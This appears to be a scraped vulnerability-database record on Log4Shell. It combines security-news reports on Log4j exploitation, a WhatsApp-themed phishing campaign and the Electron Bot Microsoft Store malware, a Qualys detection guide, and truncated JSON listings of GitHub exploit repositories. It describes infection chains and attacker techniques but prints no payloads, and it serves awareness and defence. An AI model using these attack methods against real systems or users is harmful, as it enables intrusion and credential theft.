The initial flaw – [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) – was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:

 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to …
 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache’s initial patch. Plus, there was …
 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups rather than the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228, the lookups that, in the Log4Shell vulnerability, allow attackers to execute any code that’s returned.

At this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.

In a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month’s end. “Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,” Microsoft security researchers warned.

“Exploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” the researchers said.

## Hunting Down Log4j

One of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word “ubiquitous” has applied since the get-go.

“Since it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,” J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.

He added, “Even worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.”

We’re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.

One question: What’s the inventory of equipment that still needs to be triaged?

“For organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,” Guy remarked. “Reporting the ‘pending triage’ statistic requires a complete asset inventory, including which machines have been successfully triaged.”

He called this “one of the larger hidden challenges” in every organization’s response, given that so few have a comprehensive asset inventory, “despite the fact it has been a top requirement in every security compliance program for decades.”

_Source: Threatpost, [FTC to Go After Companies that Ignore Log4j](<https://threatpost.com/ftc-pursue-companies-log4j/177368/>), published 2022-01-05._

Attackers are spoofing voice message notifications from WhatsApp in a [malicious phishing campaign](<https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/>) that uses a legitimate domain to spread an info-stealing malware, researchers have found.

Researchers at cloud email security firm Armorblox discovered the malicious campaign [targeting Office 365](<https://threatpost.com/office-365-phishing-attack-financial-execs/164925/>) and Google Workspace accounts using emails sent from a domain associated with the Center for Road Safety, an entity believed to reside within the Moscow, Russia region. The site itself is legitimate, as it’s connected to the State Road Safety operations for Moscow and belongs to the Ministry of Internal Affairs of the Russian Federation, according to [a blog post](<https://www.armorblox.com/blog/whatsapp-voicemail-phishing-attack/>) published Tuesday.

So far, attackers have reached about 27,660 mailboxes with the campaign, which spoofs WhatsApp by informing victims they have a “new private voicemail” from the chat app and includes a link purporting to allow them to play it, researchers said.
Targeted organizations include healthcare, education and retail, researchers said.

The attack “employs a gamut of techniques to get past traditional email security filters and pass the eye tests of unsuspecting victims,” Armorblox Product Marketing Manager Lauryn Cash wrote in the post.

Those tactics include [social engineering](<https://threatpost.com/fbi-social-engineering-hacks-lead-to-millions-lost-to-wire-fraud/114453/>) by eliciting trust and urgency in the emails sent to victims; brand impersonation by spoofing WhatsApp; the exploitation of a legitimate domain from which to send the emails; and the replication of existing workflows, i.e. getting an email notification of a voice message, Cash explained.

## **How It Works**

Potential victims of the campaign receive an email with the title “New Incoming Voice message” that includes a header in the email body reiterating this title. The email body spoofs a secure message from WhatsApp and tells the victim that he or she has received a new private voicemail, including a “Play” button so they allegedly can listen to the message.

The domain of the email sender was “mailman.cbddmo.ru,” which Armorblox researchers linked to the center for road safety of the Moscow region page – a legitimate site that allows the emails to [slip past](<https://threatpost.com/low-detection-phishing-kits-bypass-mfa/178208/>) both Microsoft and Google’s authentication checks, they said. However, it’s possible that attackers exploited a deprecated or old version of this organization’s parent domain to send the malicious emails, they acknowledged.

If the recipient clicks the email’s “Play” link, he or she is redirected to a page that attempts to install a trojan horse, JS/Kryptik – a malicious obfuscated JavaScript code embedded in HTML pages that redirects the browser to a malicious URL and implements a specific exploit, according to the post.

Once the target lands on the malicious page, a prompt asks for confirmation that the victim is not a robot. Then, if the victim clicks “allow” on the popup notification in the URL, a browser ad service can install the malicious payload as a Windows application, allowing it to bypass User Account Control.

“Once the malware was installed … it can steal sensitive information like credentials that are stored within the browser,” Cash wrote.

## **Targeting Unsuspecting Consumers**

While the campaign appears to be focused on consumers rather than businesses, it could be a threat to corporate networks if victims take the bait and the malware is installed, one security professional noted.

“The complexity and sophistication of the techniques make it very hard for the average consumer to detect a malicious attempt,” Purandar Das, CEO and co-founder at Sotero, an encryption-based data security solutions company, wrote in an email to Threatpost. “You could potentially see a path where they are able to collect business information once the malware is deployed and active.”

“Targeting consumers is a successful path for cybercriminals, as people seem to let their guard down more with electronic communication than real-life communication,” noted another security professional. “The average person often falls for online scams if they are familiar with the social-media platform claiming to be the message sender,” James McQuiggan, security awareness advocate at security firm KnowBe4, wrote in an email to Threatpost.

“When they see it, most people will recognize someone trying to scam them in real life,” he said, citing an example of a New York City street merchant trying to sell a passer-by a fake brand-name watch or handbag. “Most people will know they are fake and carry on walking,” McQuiggan observed.

However, many people might not recognize that an email claiming to have a voicemail from a popular messaging app or another social media platform is a scam, and go along with it, he said.

“Users are too accepting of emails,” McQuiggan said. “There needs to be more education for everyone, not just within organizations, to spot electronic social engineering or scams, so it is apparent like someone who is trying to sell a fake watch or handbag on the street.”

_Source: Threatpost, [Attackers Spoof WhatsApp Voice-Message Alerts to Steal Info](<https://threatpost.com/attackers-whatsapp-voice-message/179244/>), published 2022-04-06._

A backdoor malware that can take over social-media accounts – including Facebook, Google and SoundCloud – has infiltrated Microsoft’s official store by cloning popular games such as Temple Run or Subway Surfer.

The backdoor, dubbed Electron Bot, gives attackers complete control over compromised machines. Among the multiple evil deeds it can execute remotely, it enables its operators to register new accounts, log in, and comment on and like other social media posts – all in real time.

In a Thursday [report](<https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/>), Check Point Research (CPR) said that the malware has claimed more than 5,000 victims in 20 countries – most from Bermuda, Bulgaria, Russia, Spain and Sweden – in its actively ongoing onslaught.

It’s mainly being distributed via the Microsoft store platform, hiding in dozens of infected apps – mostly games – that the attackers are “constantly” uploading, CPR said.

A Microsoft spokesperson told Threatpost on Thursday that “We are investigating this issue and will take appropriate action to protect customers.”

## **SEO Poisoning, Ad-Clicking and Fraud**

As for its endgame, CPR researchers described the newly discovered and analyzed Electron Bot backdoor as “a modular SEO-poisoning malware” used “for social-media promotion and click
fraud.\u201d\n\nIn an SEO-poisoning attack, threat actors create malicious websites and use search-engine optimization tactics that force those sites to the top of search results.\n\nSEO poisoning, besides ginning up malicious sites\u2019 SEO showings, is also sold as a service to promote other websites\u2019 rankings. It can be just another tool in malware pushers\u2019 kit bags: In March 2021, for example, we saw Gootkit malware use Google SEO poisoning to [expand](<https://threatpost.com/malware-loader-google-seo-payload/164377/>) the number of payloads it delivers.\n\nElectron Bot also functions as an ad clicker, constantly clicking on remote websites to produce clicks on ads that generate pay-per-click (PPC) ad revenue.\n\nIt can also promote social-media accounts, such as YouTube and SoundCloud, to direct traffic to specific content, thereby jacking up views and ad-clicks for yet more PPC loot. Electron Bot can also promote online products: another way to generate PPC revenue or increase a store\u2019s rating for higher sales.\n\nThe Electron framework enables the bot to \u201cimitate human browsing behavior and evade website protections,\u201d CPR explained.\n\n## Electron: Quietly Buzzing for Years\n\nResearchers said that the first hint of the attackers having trespassed into Microsoft\u2019s app store came at the end of 2018, when an [ad-clicker](<https://threatpost.com/ad-fraud-iot-hack/144552/>) campaign was [discovered](<https://www.bleepingcomputer.com/news/security/ad-clicker-hiding-as-google-photos-app-found-in-microsoft-store/>) hiding in an app called \u201cAlbum by Google Photos\u201d \u2013 an app that its authors, audaciously enough, fraudulently pushed as being published by Google LLC.\n\nThe malware has gotten bigger and brawnier over the years. 
The bot gets its name from [Electron](<https://www.electronjs.org/>), an open-source framework for building cross-platform, native desktop applications using web technologies such as JavaScript.\n\nThe bot hides by having most of its controlling scripts load dynamically at run time from the attackers\u2019 servers, CPR said. This approach keeps the malware nimble, too, they said: \u201cThis enables the attackers to modify the malware\u2019s payload and change the bots\u2019 behavior at any given time.\u201d\n\nWhile the bot\u2019s current activities on infected machines aren\u2019t terribly high-risk, researchers noted, the malware could do far worse, given the Electron framework\u2019s granting of access to all computer resources, including GPU computing.\n\n\u201cAs the bot\u2019s payload is loaded dynamically at every run time, the attackers can modify the code and change the bots\u2019 behavior to high-risk,\u201d they said. \u201cFor example, they can initialize another second stage and drop a new malware such as ransomware or a [remote-access trojan, or RAT]. All of this can happen without the victim\u2019s knowledge.\u201d\n\n## Electron Bot Infection Routine\n\nThe infection starts when a victim installs an infected app from the Microsoft Store.\n\n\u201cWhen the user launches the game, a JavaScript dropper is loaded dynamically in the background from the attackers\u2019 server,\u201d according to CPR. \u201cIt then executes several actions including downloading and installing the malware and gaining persistency on the startup folder.\u201d\n\nWhen the infected system next starts up, the malware launches, establishes a connection with the command-and-control server (C2), and receives a dynamic JavaScript payload with a set of capability functions. 
Finally, the C2 sends the configuration file commands to execute.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/24123550/Electronc-Bot-infection-chain-e1645724162827.jpg>)\n\nElectron bot infection chain. Source: CPR.\n\nCPR used the popular Temple Endless Runner 2 game as an example of the games cloned by the Electron Bot attackers. This particular game involves an \u201cinfinite\u201d runner, escaping from an enemy by crossing cliffs, forests and mines; evil ape monsters in hot pursuit; a photosensitive seizure warning; and about 100 reviews.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/24124502/Temple-Endless-Runner-game-e1645724715406.jpg>)\n\nThe popular Temple Endless Runner 2 game cloned by the Electron Bot operators. Source: CPR.\n\n## Click-Happy App Store Customers, Beware\n\nIt\u2019s that kind of (potentially seizure-inducing) popularity that gets us into trouble.\n\nAs it is, official app stores are rife with [fraud, fleeceware](<https://threatpost.com/apple-app-store-fraud-fleeceware/166703/>) and [banking trojans](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>). 
The latest of the lot is the Xenomorph banking trojan recently [discovered](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) by ThreatFabric, and the most ironic must surely be Vultur, a trojan tucked into a fully functioning two-factor authentication (2FA) app that recently [infected](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>) 10,000 victims who downloaded it from Google Play.\n\nElectron Bot\u2019s successful incursion into Microsoft\u2019s official app store is just the latest glaring example of how people throw caution to the wind when they see a shiny new toy on the app stores, CPR researchers warned: \u201cGiven most people think that you can trust application store reviews, they do not hesitate to download an application from there.\u201d\n\nCPR passed on these safety tips:\n\n * Avoid downloading an application with a small number of reviews.\n * Look for applications with good, consistent and reliable reviews.\n * Pay attention to suspicious application naming that\u2019s not identical to the original name.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T18:42:49", "type": "threatpost", "title": "Microsoft App Store Sizzling with New \u2018Electron Bot\u2019 Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T18:42:49", "id": "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "href": "https://threatpost.com/microsoft-app-store-electron-bot-malware/178629/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-12-29T22:47:45", "description": "_Since the Log4Shell vulnerability was first discovered, Qualys has analyzed and responded to the threat in a systematic way approaching it from all 
angles \u2013 detection, mitigation and remediation. Recognizing the challenge it poses to large enterprises, we recommend that organizations follow a prioritized, layered approach in addressing this vulnerability._\n\nSince the Log4Shell vulnerability was first discovered, the Qualys Research Team has analyzed the threat and updated Qualys Cloud Platform to help customers respond quickly.\n\nWe recognize that for many organizations the scope of the challenge is large, as it involves all Java-based applications in their environment. Recognizing which application was written in Java, let alone if it uses a vulnerable version of Log4j, can be a challenge. As a result, Qualys recommends that organizations take a prioritized, layered approach to remediate and eliminate this vulnerability wherever it lives.\n\n* * *\n\n### Log4Shell \u2013 5 Key Things You Need to Know\n\n 1. Java is the third most used computer language.\n 2. Log4j is used in most Java based applications. You should assume that any application, home grown or purchased, in your environment that is based on Java - including web, server, database, desktop, and client applications (even games) - may be impacted and must be validated.\n 3. Detection is not straightforward, as there is no standard way of using Log4j inside Java applications, and therefore multiple detection techniques are required.\n 4. The vulnerability is very easy to exploit and exploit tools are already available to download. Attackers are actively exploiting this vulnerability at a rate of 100+ attacks per minute!\n 5. 
The US Cybersecurity & Infrastructure Security Agency (CISA) has directed all civilian agencies to mitigate [CVE-2021-44228](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) by December 24, 2021 \u2013 Christmas Eve \u2013 which clearly communicates the urgent risk introduced by this vulnerability.\n\n* * *\n\n### What Attackers Know and What They Are Doing\n\nLog4Shell is a new, easy-to-exploit vulnerability that was discovered in mid-December 2021. It is potentially one of the most significant code errors ever discovered, given the prevalence of Java. Most of the world\u2019s enterprises are still trying to figure out if they are impacted and to what extent. Because Java is commonly used to build web applications, Log4Shell proliferated easily across the web. Even worse, most web applications connect to a backend application that is most likely also written in Java. This means that one successful exploit could result in additional exploits downstream.\n\nThe bottom line: compromises of public-facing web applications around the world with this newly discovered, easy-to-exploit vulnerability have a good chance of succeeding.\n\nInevitably, many security firms have already reported seeing large-scale attacks against publicly facing web applications that leverage the Log4Shell vulnerability.\n\n### So What Can You Do?\n\n### STEP 1: Quickly Scan Your External Attack Surface\n\nAs a first step, Qualys recommends that all organizations quickly scan their external attack surface (public-facing websites and applications) to identify any potential vulnerability by simulating the attack using the [free service](<http://www.qualys.com/was-log4shell-help>) we have provided.\n\nOur Research Team has created dedicated attack simulations that mimic Log4Shell attack vectors currently in use. Customers can easily run those simulations directly from the Qualys cloud without the need to install any software or reconfigure their network. 
By running these simulations, customers can see what attackers see, and be alerted if one of their publicly available websites is exposed.\n\n**Qualys has made its Web Application Scanner (WAS) application available for everyone for 30 days.**\n\n### STEP 2: Find Where You Are Vulnerable and Prioritize\n\nA big challenge introduced by this vulnerability is detecting it. As Log4Shell may affect any Java application that uses a vulnerable version of Log4j, it is important to consider the following:\n\n * Java is used in different ways for different applications; in some cases it is not straightforward even to recognize a Java application\n * Java applications can run on different platforms and OSes, from servers to workstations to appliances\n * By its nature the Log4j library can be embedded in nonstandard ways, which makes detecting all vulnerable Log4j instances far from straightforward\n\nAs such, Qualys offers a multi-layered approach to help our customers detect where they are vulnerable. These layers comprise three of our apps: CSAM, VMDR, and Container Security.\n\n#### Qualys Cybersecurity Asset Management (CSAM)\n\nQuerying inventory is an efficient way to find Java-based software installed in your environment. However, since Java-based applications may be common in any environment, such queries may return a long list of applications that will require a time-consuming process to validate. Your time is better spent on other, higher-priority tasks.\n\nTo help our customers run more efficient inventory queries for suspected Java applications, the Qualys Research Team has enriched the inventory data collected by CSAM. We can now flag applications that are recognized by the community as vulnerable to the Log4Shell exploit (based on [this GitHub repository](<https://github.com/cisagov/log4j-affected-db>)). 
Furthermore, by utilizing CSAM\u2019s ability to tag internet-facing assets, those queries can focus first on your external-facing Java-based applications that are flagged as vulnerable. CSAM integration with your CMDB provides another method for prioritization, as it will allow you to focus on your business-critical applications first.\n\n#### Qualys Vulnerability Management Detection and Response (VMDR)\n\nThe Qualys Research Team has added multiple signature-based QIDs that are designed to detect this vulnerability on all assets in your organization.\n\nAs explained above, by its nature this vulnerability is harder to detect and will require a multi-layered approach for detection. Qualys recommends its customers use different types of detection methods that are designed to complement each other:\n\n * First, a fast, accurate detection for commonly used Java and Log4j deployment methods. The benefit of this set of QIDs is their ability to be used as part of your regular VM scans, as they are efficient and accurate. However, the downside is that they may miss some applications that do not use Java or Log4j in standard ways.\n * Second, a complementary, out-of-band, in-depth detection method that is designed to detect the majority of vulnerable Log4j instances, regardless of the deployment method used or the application status. This is an accurate method of detecting the Log4Shell vulnerability but may require intensive computation and more time to scan. As such, this detection method should be used out-of-band and does not need to run as frequently as the faster detection methods mentioned above.\n\nNote: even if the application does not log anything that an attacker can influence, Qualys still recommends that you treat this application as vulnerable and patch it. 
Qualys detection logic assumes that a vulnerable application is one that has a vulnerable version of Log4j.\n\n#### Qualys Container Security\n\nAs containers are common in many environments, and Java is a commonly used language for building applications that run in containers, scanning for the Log4Shell vulnerability in your containers is a critical next step. Qualys Container Security offers multiple methods to help you detect Log4Shell in your container environment, covering both running containers and container images. Initially, we recommend running a vulnerability scan against all your running containers. Similar to our VMDR scan mentioned above, those runtime scans will help identify all instances of this vulnerability in cases where the app is using the common methods of deploying Java and Log4j. But similar to VMDR detection, Qualys recommends utilizing our dedicated, in-depth detection to complement the runtime detection methods. This dedicated, in-depth detection logic for all vulnerable Log4j instances can interact with your build and/or deployment process and perform an in-depth scan of your container images. This in-depth container image scan can be triggered in three different stages of your container image\u2019s lifecycle: during the build process, as the image is uploaded to the registry, and before the image is deployed to production.\n\nQualys Container Security offers a comprehensive solution for detecting Log4Shell vulnerabilities across the entire lifecycle of the container from build time to runtime.\n\n### STEP 3: Remediation\n\nOnce your higher priority vulnerable applications are identified, we recommend that our customers begin their remediation processes. As the Log4Shell vulnerability may affect every Java-based application, different remediation methods will be required. 
Each should be based on the unique application type and function.\n\nAs vendors start to release patches to their Java-based vulnerable applications, we recommend using Qualys Patch Management to patch your Linux and Windows assets in an efficient way.\n\nHowever, in some cases the vulnerable Java application will require a \u201csurgical\u201d fix as it cannot be patched. In such cases the patch management solution can be used to update the Log4j jar to a non-vulnerable version, or to delete the JNDI class as recommended by Apache.\n\n### STEP 4: Detect Exploits\n\nDue to the complexity of detecting and remediating this vulnerability, we recommend utilizing Qualys EDR to help detect exploit attempts in real time. Qualys EDR has been updated with specific content and workflows to help monitor and alert on suspicious activities related to the Log4Shell exploit. Using the EDR tool, customers can view real-time threat reports and triage exploits in cases where suspicious activity was detected.\n\nWe at Qualys hope that this blog has provided you with some guideposts to follow when confronting how Log4Shell may threaten your environment. 
Please bookmark [the Log4Shell section](<https://www.qualys.com/log4shell>) of our website and return regularly for the latest threat intelligence.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T18:00:00", "type": "qualysblog", "title": "Log4Shell \u2013 Follow This Multi-Layered Approach for Detection and Remediation", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T18:00:00", "id": "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-29T22:22:29", "description": "# Log4j-Windows-Scanner\nCVE-2021-44228 vulnerability in Apache L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T10:37:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T19:51:54", "id": "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-14T11:34:08", "description": "# CVE-2021-44228-VULN-APP\n- NOTE: This is not a virtual vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:45:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T08:27:22", "id": "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:09:03", "description": "# IMPORTANT DISCLAIMER\n\n**THIS SCRIPT CAN LAND YOU IN SERIOUS TR...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T19:37:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T15:04:11", "id": "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-01T18:29:04", "description": "# log4j-exploit-builder\nScript to create...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T17:41:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-01T14:21:09", "id": "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T03:39:12", "description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T22:09:51", "id": "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# cve-2021-44228-qingteng-online-patch \n\n## What is this\n\nHot-pa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:30:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 